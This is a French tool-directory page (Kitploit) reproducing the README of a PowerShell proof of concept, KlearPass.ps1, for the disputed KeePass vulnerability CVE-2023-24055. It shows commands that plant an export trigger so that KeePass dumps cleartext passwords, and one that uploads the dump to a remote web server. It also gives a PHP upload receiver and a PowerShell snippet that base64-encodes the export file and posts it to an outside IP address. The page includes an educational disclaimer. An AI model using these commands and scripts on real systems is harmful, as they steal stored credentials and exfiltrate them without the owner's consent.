Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-24055 — CVE-2023-24055 POC écrit en PowerShell. | Kitploit
Outils/GitHubGitHub/yosef0x01/cve-2023-24055
Attaques de Mots de PasseAnalyse des VulnérabilitésExploitationExfiltration de DonnéesApprentissage et Éducation
GitHubyosef0x01/cve-2023-24055

CVE-2023-24055

CVE-2023-24055 POC écrit en PowerShell.

Voir le dépôt
14il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

alt text

Avertissement

Ce script est fourni à des fins éducatives et de démonstration uniquement. L'auteur n'approuve ni ne tolère l'utilisation de ce script pour des activités criminelles ou malveillantes ; il ne doit être utilisé que là où une autorisation explicite a été donnée.

Utilisez ce script avec prudence, car il modifiera le fichier de configuration de KeePass et supprimera tous les déclencheurs précédemment configurés. L'utilisation de ce script peut entraîner un comportement inattendu et potentiellement casser l'application KeePass. À utiliser à vos propres risques.

Introduction

Ce script illustre la vulnérabilité ** DISPUTED ** (CVE-2023-24055) de KeePass jusqu'à la version 2.53 (dans une installation par défaut), car elle permet à un attaquant disposant d'un accès en écriture au fichier de configuration XML d'obtenir les mots de passe en clair en ajoutant un déclencheur d'exportation. Notez que la position du développeur est que la base de données de mots de passe n'est pas censée être sécurisée contre un attaquant disposant de ce niveau d'accès au PC local.

Références :

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24055
  • https://www.bleepingcomputer.com/news/security/keepass-disputes-vulnerability-allowing-stealthy-password-theft/
  • https://keepass.info/

Instructions

Pour utiliser ce script, exécutez-le dans PowerShell et fournissez les paramètres nécessaires. Les paramètres obligatoires sont les suivants :

  • -filename : Le chemin complet et le nom du fichier dans lequel les mots de passe seront exportés.

Les paramètres facultatifs sont :

  • -uploadURL : Ce commutateur indique que les données doivent être téléchargées vers l'URL spécifiée.
  • -url : L'URL vers laquelle les données doivent être téléchargées.

Exemples d'utilisation

Exporter les mots de passe en clair :

root@kitploit:~
.\KlearPass.ps1 -filename c:\windows\tasks\export.txt

Exporter les mots de passe en clair et télécharger l'exportation vers un serveur web :

root@kitploit:~
.\KlearPass.ps1 -filename c:\windows\tasks\export.txt -uploadURL http://192.168.238.141/KeePass/upload.php

Aide détaillée :

root@kitploit:~
get-help .\KlearPass.ps1 -Detailed

Exemple de script PHP pour télécharger un fichier sur le serveur web

root@kitploit:~
<?php
if (!empty($_POST['filename']) && !empty($_POST['data'])) {
    $target_directory = '/var/www/html/KeePass/uploads/';
    $filename = $target_directory . $_POST['filename'];
    $data = base64_decode($_POST['data']);
    file_put_contents($filename, $data);
}
?>

Exemple de script PowerShell pour tester le téléchargement PHP

root@kitploit:~
$filename = "c:\windows\tasks\export.txt";
$file = [System.IO.Path]::GetFileName($filename);
$encodedFile = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes([System.IO.File]::ReadAllText($filename)));
$http = New-Object System.Net.WebClient;
$http.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
$http.UploadString("http://192.168.238.141/KeePass/upload.php", "filename=$file&data=$encodedFile");

Crédits

  • Script initialement basé sur le code trouvé sur https://github.com/GhostPack/KeeThief/blob/master/PowerShell/KeePassConfig.ps1
  • L'idée d'exfiltrer l'exportation est attribuée à https://github.com/alt3kx/CVE-2023-24055_PoC.
Télécharger l’outil